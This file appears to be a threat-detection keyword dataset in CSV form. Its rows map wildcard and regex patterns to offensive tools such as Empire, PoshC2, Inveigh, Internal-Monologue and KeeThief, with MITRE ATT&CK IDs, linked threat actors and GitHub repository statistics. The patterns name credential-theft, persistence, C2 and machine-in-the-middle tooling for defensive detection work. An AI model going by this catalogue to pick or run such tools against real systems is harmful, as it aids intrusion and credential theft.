"*install_zerologon*",".{0,1000}install_zerologon.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48705"
"*installexe-persistence*",".{0,1000}installexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48707"
"*Installing DHCP server and net-tools*",".{0,1000}Installing\sDHCP\sserver\sand\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","48708"
"*Installing systemwide remote access permanentally*",".{0,1000}Installing\ssystemwide\sremote\saccess\spermanentally.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","48709"
"*Install-Module -Name DSInternals*",".{0,1000}Install\-Module\s\-Name\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","48712"
"*Install-Module -Name Invoke-ArgFuscator*",".{0,1000}Install\-Module\s\-Name\sInvoke\-ArgFuscator.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48713"
"*Install-Module -Name PSnmap -Scope *",".{0,1000}Install\-Module\s\-Name\sPSnmap\s\-Scope\s.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","48714"
"*Install-Module ps2exe*",".{0,1000}Install\-Module\sps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","48715"
"*install-persistence*",".{0,1000}install\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48716"
"*install-persistence-cron*",".{0,1000}install\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48717"
"*Install-ServiceBinary*",".{0,1000}Install\-ServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48720"
"*Install-SQLC2AgentLink*",".{0,1000}Install\-SQLC2AgentLink.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48721"
"*Install-SQLC2Server*",".{0,1000}Install\-SQLC2Server.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48722"
"*Install-SSP -Path*.dll*",".{0,1000}Install\-SSP\s\-Path.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Install-SSP.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48724"
"*Install-SSP.ps1*",".{0,1000}Install\-SSP\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48725"
"*install-tor2web.sh*",".{0,1000}install\-tor2web\.sh.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","48726"
"*int PotatoAPI::findNTLMBytes*",".{0,1000}int\sPotatoAPI\:\:findNTLMBytes.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","48729"
"*Intercepter-NG*",".{0,1000}Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48735"
"*Intercepter-NG-1.0.zip*",".{0,1000}Intercepter\-NG\-1\.0\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48736"
"*Intercepter-NG-1.3.zip*",".{0,1000}Intercepter\-NG\-1\.3\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48737"
"*Interesting? there are multiple .NET runtimes loaded in KeePass*",".{0,1000}Interesting?\sthere\sare\smultiple\s\.NET\sruntimes\sloaded\sin\sKeePass.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48738"
"*--interface * --wpad --lm --disable-ess*",".{0,1000}\-\-interface\s.{0,1000}\s\-\-wpad\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48739"
"*Internal-Monologue.exe*",".{0,1000}Internal\-Monologue\.exe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48740"
"*InternalMonologueDll*",".{0,1000}InternalMonologueDll.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48741"
"*InternalMonologueExe*",".{0,1000}InternalMonologueExe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48742"
"*IntruderPayloadGeneratorFactory.class*",".{0,1000}IntruderPayloadGeneratorFactory\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","48744"
"*IntruderPayloadProcessor.class*",".{0,1000}IntruderPayloadProcessor\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","48745"
"*IntruderPayloads*",".{0,1000}IntruderPayloads.{0,1000}","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","N/A","10","3779","1191","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z","48746"
"*-Inveigh *",".{0,1000}\-Inveigh\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48747"
"*Inveigh Relay*",".{0,1000}Inveigh\sRelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48748"
"*Inveigh.exe*",".{0,1000}Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","48749"
"*Inveigh.ps1*",".{0,1000}Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48750"
"*Inveigh.psd1*",".{0,1000}Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48751"
"*Inveigh.psm1*",".{0,1000}Inveigh\.psm1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48752"
"*Inveigh.sln*",".{0,1000}Inveigh\.sln.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48753"
"*inveigh_version*",".{0,1000}inveigh_version.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48754"
"*Inveigh-BruteForce.ps1*",".{0,1000}Inveigh\-BruteForce\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48755"
"*Inveigh-Cleartext.txt*",".{0,1000}Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48756"
"*Inveigh-FormInput.txt*",".{0,1000}Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48757"
"*Inveigh-Log.txt*",".{0,1000}Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48758"
"*Inveigh-master*",".{0,1000}Inveigh\-master.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48759"
